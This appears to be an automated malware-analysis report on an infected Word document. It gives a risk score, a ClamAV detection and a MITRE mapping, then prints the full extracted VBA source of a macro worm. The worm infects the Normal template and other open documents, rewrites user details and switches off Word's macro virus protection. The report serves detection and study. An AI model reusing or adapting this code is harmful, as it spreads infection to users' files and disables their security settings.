MALICIOUS
80
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample is a Microsoft Word document containing VBA macros. The macros are designed to spread themselves to other documents and templates, as indicated by the code attempting to find and inject the 'JERRY © MoDule-S 2002' marker into other VBComponents. This behavior suggests a macro-based malware dropper or worm. The ClamAV detection of 'Doc.Trojan.Skaarj-2' further supports its malicious nature.
Heuristics 2
-
ClamAV: Doc.Trojan.Skaarj-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Skaarj-2
-
VBA macros detected medium OLE_VBA_MACROSDocument contains VBA macro code
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3734 bytes |
SHA-256: 5b736421f9c04d9a1c7d43c15594b4f0e597c57f61a9e30b9fdc3f8fe0005f4b |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
Const Mark = "JERRY © MoDule-S 2002"
On Error GoTo handler
Dim WDoc As Word.Document, M As Object, c As Object, Infected As Boolean, Found As Boolean
Dim Saved As Boolean, Mon As String, Phrase As Byte, t As Long, i As Long, n As Boolean, Process As Byte
Set M = Nothing
n = False
If Application.UserName <> "IDm@n" Then
MsgBox "JERRY is running." & Chr(10) & "Thank you!", vbInformation, Mark
With Application
.UserName = "IDm@n"
.UserInitials = "MDS"
.UserAddress = "idman@nwgsm.ru"
End With
With ActiveDocument
.BuiltInDocumentProperties(1) = Mark
.BuiltInDocumentProperties(2) = "Infected by JERRY"
.BuiltInDocumentProperties(3) = "IDm@n"
.BuiltInDocumentProperties(4) = "MoDule-S"
.BuiltInDocumentProperties(5) = "© MoDule-S 2002"
.Saved = True
End With
End If
Process = 0
Found = False
For Each c In NormalTemplate.VBProject.VBComponents
If c.Type = 100 Then
If c.CodeModule.Find(Mark, 1, 1, 100000, 100000) Then
Found = True
Set M = c.CodeModule
End If
End If
Next
Do
For Each WDoc In Word.Documents
If WDoc.SaveFormat = wdFormatDocument Or WDoc.SaveFormat = wdFormatTemplate Then
For Each c In WDoc.VBProject.VBComponents
If c.Type = 100 Then
If c.CodeModule.Find(Mark, 1, 1, 100000, 100000) Then
Set M = c.CodeModule
Found = True
ElseIf Found Then
Saved = WDoc.Saved
On Error GoTo handler
t = c.CodeModule.ProcBodyLine("Document_Close", vbext_pk_Proc)
c.CodeModule.DeleteLines t, c.CodeModule.ProcCountLines("Document_Close", vbext_pk_Proc)
out:
c.CodeModule.InsertLines t, M.Lines(M.ProcBodyLine("Document_Close", vbext_pk_Proc), M.ProcCountLines("Document_Close", vbext_pk_Proc))
If Saved Then WDoc.Save
Infected = True
Else
frmMain.Show
End If
End If
Next
End If
Next
Process = Process + 1
If Process = 3 Then Exit Do
Loop Until Infected
If Found Then
For Each c In NormalTemplate.VBProject.VBComponents
If c.Type = 100 Then
If Not c.CodeModule.Find(Mark, 1, 1, 100000, 100000) Then
Saved = NormalTemplate.Saved
n = True
t = c.CodeModule.ProcBodyLine("Document_Close", vbext_pk_Proc)
c.CodeModule.DeleteLines t, c.CodeModule.ProcCountLines("Document_Close", vbext_pk_Proc)
out1:
c.CodeModule.InsertLines t, M.Lines(M.ProcBodyLine("Document_Close", vbext_pk_Proc), M.ProcCountLines("Document_Close", vbext_pk_Proc))
If Saved Then NormalTemplate.Save
End If
End If
Next
End If
With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0: End With
Exit Sub
handler:
t = 1
If n = False Then
Resume out
Else
Resume out1
End If
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.